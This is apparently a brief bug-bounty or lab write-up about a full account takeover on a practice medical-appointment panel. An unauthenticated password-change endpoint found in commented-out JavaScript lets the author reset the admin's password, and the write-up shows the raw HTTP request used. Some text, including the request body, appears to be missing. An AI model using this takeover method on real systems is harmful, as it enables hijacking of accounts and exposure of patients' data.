Full Account takeover (even for admins)

2 min readMay 8


There is a commented out snippet of js code on /drpanel/index.php this code is for changing password of a user, the js code is incomplete but one can fill in the blanks easily.

so i guessed that there is an endpoint /drpanel/drapi/editpassword.php that accepts a post request and username body parameter, so i tried it and used it on my logged in user and it succeeded so why stop there, i know from v1 that the admin account username is drAdmin so i tried it and indeed i was able to change password of drAdmin and log in successfully.


POST /drpanel/drapi/editpassword.php HTTP/1.1
Host: <your_instance>.a.firstbloodhackers.com
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

me logged in and able to view appointments of patients (which I couldn’t do with my self registered user)


I can takeover any user by just knowing the username.




Network Security Researcher I Content writer I Blog writer